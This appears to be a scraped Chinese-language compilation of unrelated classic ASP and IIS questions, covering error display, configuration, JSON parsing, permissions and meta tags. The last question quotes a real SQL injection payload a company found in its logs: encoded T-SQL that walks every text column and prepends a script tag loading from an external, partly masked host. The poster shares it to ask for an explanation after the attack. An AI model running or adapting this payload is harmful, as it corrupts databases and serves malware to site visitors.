标签: asp-classic

IIS 7.5,2008rc2,经典asp,500错误消息:

由于发生内部服务器错误,无法显示页面.

我需要知道如何配置IIS以获得更详细的错误.
我已经尝试在ASP配置中设置为true所有调试选项.
但那没用.谁能帮我？

我正在开发一个数据访问组件,该组件将用于包含经典ASP和ASP.NET页面混合的网站,并且需要一种管理其配置设置的好方法.

我想使用自定义ConfigurationSection,对于ASP.NET页面,这非常有用.但是当从传统的ASP页面通过COM interop调用组件时,组件不会在ASP.NET请求的上下文中运行,因此不了解web.config.

有没有办法告诉ConfigurationManager只需从任意路径加载配置(例如,..\web.config如果我的程序集在/bin文件夹中)？如果有,那么我认为我的组件可以回退到如果默认ConfigurationManager.GetSection返回null我的自定义部分.

任何其他方法都欢迎!

我已经能够在Classic ASP(VBScript)中找到用于生成 JSON 的数量众多的库,但我还没有找到任何用于解析的 ANY .

我想要一些我可以传递JSON字符串并返回某种类型的VBScript对象(Array,Scripting.Dictionary等)的东西

任何人都可以推荐一个库来解析经典ASP中的JSON吗？

我刚刚安装了IIS,所以我可以在浏览器中查看asp文件,但是当我将地址放在浏览器中时:http://localhost/index.asp我收到错误.

错误显示:

HTTP错误401.3 - 未经授权由于Web服务器上此资源的访问控制列表(ACL)配置或加密设置,您无权查看此目录或页面.

我真的需要解决这个问题,我非常感谢你提出这方面的建议.

我在IIS 7上运行经典ASP.

即使我将ASP"调试属性"配置为"将错误发送到浏览器= True",Web应用程序仍然会向浏览器发送错误并继续发送500内部服务器错误.

• 我的浏览器未选中"显示友好HTTP错误消息".
• 安装了失败的请求跟踪(不确定是否相关)
• 发生在服务器上本地加载的网页和远程网站上
• 应用程序池已集成(不确定是否重要)

有任何想法吗？

我正在开发一个ASP应用程序,代码,模板和文件的组织方式不允许我改变body标签之外的任何内容.所以我在考虑在体内插入元标记 - 就像这样:

<!-- FEW ASP INCLUDES -->
<html>
    <head>
    <!-- FALLBACK TITLE AND DESCRIPTION -->
    <title>Default Title</title>
    <meta name="description" content="Default Description">
</head>
<body>
    <!-- SOME HTML MARKUP -->
    <div class="dynamic-content">
        <!-- InstanceBeginEditable name="dynamic-content" -->
        <!-- THIS IS WHERE I CAN WRITE ASP CODE -->
        <title><%= Page.Meta.GetTitle( yada, yada ) %></title>
        <meta name="description" content="<%= Page.Meta.GetDescription( yada, yada ) %>">
        <!-- InstanceEndEditable -->
    </div>
    <!-- SOME MORE HTML MARKUP -->
</body>
</html>

我想知道将meta标签放在HTML文档的正文中有多好.它如何影响:

1. 搜索引擎
2. 浏览器

通过创建几个100个简单的Web表单,与Classic ASP合作了大约2年,我看不出切换到.net的充分理由; 但是,我并不精通.net,所以我确信我可能会遗漏一些东西.

我经常听到的关于工作的一些观点可以在这里找到: http://www.packtpub.com/article/Classic-ASP(不是我分享所有这些想法,但它是一个很好的跳跃点)

我很想知道别人对此事的看法.

如何使用VBScript获取变量的类型？

虽然我知道我以前用过的术语有时会忘记这些差异......所以只是为了保持一个参考的地方......谢谢大家的答案.

我想在这里发帖,因为它与编码有很大关系,本周我必须在我公司的旧ASP(经典)网站上清理.

我们受到了几天前运行的SQL注入攻击的打击,但是我正在摸不着对于SQL服务器(通过这些SQL查询)的"损坏".

说实话,我认为这是非常巧妙的,并且我的公司因为拥有一个几乎没有消毒输入的旧的10年历史的网站而错.

攻击:

122 +声明+%的40s + VARCHAR%284000%29 + +设定40年代%%3Dcast%+ AS + VARCHAR%284000%29%29 + EXEC%28%40年代%29-

它解释为:( 我想要了解的)

set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>30 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=''"></title><script src="http://lilXXXXXXXop.com/sl.php"></script><!--''+RTRIM(CONVERT(VARCHAR(6000),['+@C+'])) where LEFT(RTRIM(CONVERT(VARCHAR(6000),['+@C+'])),17)<>''"></title><script'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

我们已经恢复了备份(预注入)并浏览了整个应用程序并清理了所有输入语句.我们的服务器是防火墙的,所以没有直接的SQL访问,但我想知道还剩下什么,我不得不承认SQL查询是我的头脑.

有人可以解决它并为我解释攻击SQL吗？

APOLOGIES我更新了完整的DUMP和SQL